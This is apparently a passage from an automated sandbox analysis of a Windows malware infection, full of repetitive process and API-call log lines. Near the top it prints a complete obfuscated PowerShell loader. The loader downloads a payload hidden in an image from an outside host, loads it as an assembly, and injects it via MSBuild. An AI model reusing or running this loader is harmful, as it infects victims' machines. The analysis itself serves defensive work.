AG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004567E0 push eax; ret 10_2_004567FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0045B9DD push esi; ret 10_2_0045B9E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00455EAF push ecx; ret 10_2_00455EC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433FF6 push ecx; ret 10_2_00434009
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10002806 push ecx; ret 10_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406128 ShellExecuteW,URLDownloadToFileW,10_2_00406128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00419BC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
